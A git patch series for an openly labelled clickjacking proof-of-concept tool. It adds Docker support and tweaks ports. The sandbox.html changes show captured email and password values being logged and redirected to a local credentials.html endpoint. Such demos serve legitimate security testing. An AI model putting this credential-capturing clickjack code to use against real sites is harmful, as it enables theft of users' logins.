From 8e50e61376a8f3dd4dd63285db7138890c75a6a6 Mon Sep 17 00:00:00 2001 From: saleem8054 Date: Sat, 30 Jan 2021 22:41:40 +0100 Subject: [PATCH 1/3] Added Docker Support --- Dockerfile | 2 ++ README.md | 16 +++++++++++++++- sandbox.html | 4 ++-- 3 files changed, 19 insertions(+), 3 deletions(-) create mode 100644 Dockerfile diff --git a/Dockerfile b/Dockerfile new file mode 100644 index 0000000..fee9684 --- /dev/null +++ b/Dockerfile @@ -0,0 +1,2 @@ +FROM nginx:alpine +COPY . /usr/share/nginx/html \ No newline at end of file diff --git a/README.md b/README.md index fd1e553..2cf1e34 100644 --- a/README.md +++ b/README.md @@ -11,7 +11,7 @@ Overview ===== A web based ClickJacking PoC Tool. -Running +Running without Docker ===== 1. Make sure you have php installed (default installed on Kali/Parrot OS) 2. Download If not already there, can also use XAMPP. @@ -21,3 +21,17 @@ Running 6. Drag and Drop the Login Buttons for PoC 7. Click on View 8. Your PoC is ready + +Running with Docker( You do not need to download dependencies like php ) +===== +1. Make sure you have docker installed in your computer. +2. There are two options to run the program in your local machine. + 1. Run "docker run -p 8000:80 saleem8054/clickjackingpoc + 2. Build the docker image by yourself. + 1. docker build -t DockerID/clickjackingpoc . ( once you build it, there is no need to run this code again) + 2. docker run -p 8000:80 DockerID/clickjackingpoc +3. Open up your browser and type localhost:8000 +4. Type in your target website name in the box and hit load. +5. Drag and Drop the Login Buttons for PoC +6. Click on View +8. Your PoC is ready diff --git a/sandbox.html b/sandbox.html index 5d2d83f..967986d 100644 --- a/sandbox.html +++ b/sandbox.html @@ -72,8 +72,8 @@ console.log('Email: ' + jacksEmail); console.log('Password: ' + jacksPassword); alert('Captured Creds are: \nUsername is: ' + jacksEmail + ' \nAND\nPassword is: ' + jacksPassword); - window.location.href = ("http://localhost:8000/credentials.html/poc=" + jacksEmail + ':' + jacksPassword); - window.reload; + window.location.href = ("http://localhost:8000/credentials.html"); + window.reload; } From f7e7eb3db5d7537d59e806aef8c045857f204a6b Mon Sep 17 00:00:00 2001 From: saleem8054 Date: Sun, 31 Jan 2021 00:04:15 +0100 Subject: [PATCH 2/3] Added Docker Feature --- Dockerfile | 6 ++++-- README.md | 6 +++--- sandbox.html | 2 +- 3 files changed, 8 insertions(+), 6 deletions(-) diff --git a/Dockerfile b/Dockerfile index fee9684..54bd9ed 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,2 +1,4 @@ -FROM nginx:alpine -COPY . /usr/share/nginx/html \ No newline at end of file +FROM php:7.4.11 +WORKDIR '/app' +COPY . . +CMD [ "php","-S","0.0.0.0:8000" ] \ No newline at end of file diff --git a/README.md b/README.md index 2cf1e34..b586e84 100644 --- a/README.md +++ b/README.md @@ -26,11 +26,11 @@ Running with Docker( You do not need to download dependencies like php ) ===== 1. Make sure you have docker installed in your computer. 2. There are two options to run the program in your local machine. - 1. Run "docker run -p 8000:80 saleem8054/clickjackingpoc + 1. Run "docker run -p 8085:8000 saleem8054/clickjackingpoc 2. Build the docker image by yourself. 1. docker build -t DockerID/clickjackingpoc . ( once you build it, there is no need to run this code again) - 2. docker run -p 8000:80 DockerID/clickjackingpoc -3. Open up your browser and type localhost:8000 + 2. docker run -p 8085:8000 DockerID/clickjackingpoc +3. Open up your browser and type localhost:8085 4. Type in your target website name in the box and hit load. 5. Drag and Drop the Login Buttons for PoC 6. Click on View diff --git a/sandbox.html b/sandbox.html index 967986d..d4605f4 100644 --- a/sandbox.html +++ b/sandbox.html @@ -72,7 +72,7 @@ console.log('Email: ' + jacksEmail); console.log('Password: ' + jacksPassword); alert('Captured Creds are: \nUsername is: ' + jacksEmail + ' \nAND\nPassword is: ' + jacksPassword); - window.location.href = ("http://localhost:8000/credentials.html"); + window.location.href = ("http://localhost:8085/credentials.html/poc=" + jacksEmail + ':' + jacksPassword); window.reload; From 6cab2433845a2364e40144fce0668b49dbfb2413 Mon Sep 17 00:00:00 2001 From: saleem8054 Date: Sun, 31 Jan 2021 00:16:33 +0100 Subject: [PATCH 3/3] corrected port mapping --- README.md | 6 +++--- sandbox.html | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index b586e84..7bb662a 100644 --- a/README.md +++ b/README.md @@ -26,11 +26,11 @@ Running with Docker( You do not need to download dependencies like php ) ===== 1. Make sure you have docker installed in your computer. 2. There are two options to run the program in your local machine. - 1. Run "docker run -p 8085:8000 saleem8054/clickjackingpoc + 1. Run "docker run -p 8000:8000 saleem8054/clickjackingpoc 2. Build the docker image by yourself. 1. docker build -t DockerID/clickjackingpoc . ( once you build it, there is no need to run this code again) - 2. docker run -p 8085:8000 DockerID/clickjackingpoc -3. Open up your browser and type localhost:8085 + 2. docker run -p 8000:8000 DockerID/clickjackingpoc +3. Open up your browser and type localhost:8000 4. Type in your target website name in the box and hit load. 5. Drag and Drop the Login Buttons for PoC 6. Click on View diff --git a/sandbox.html b/sandbox.html index d4605f4..efee832 100644 --- a/sandbox.html +++ b/sandbox.html @@ -72,7 +72,7 @@ console.log('Email: ' + jacksEmail); console.log('Password: ' + jacksPassword); alert('Captured Creds are: \nUsername is: ' + jacksEmail + ' \nAND\nPassword is: ' + jacksPassword); - window.location.href = ("http://localhost:8085/credentials.html/poc=" + jacksEmail + ':' + jacksPassword); + window.location.href = ("http://localhost:8000/credentials.html/poc=" + jacksEmail + ':' + jacksPassword); window.reload;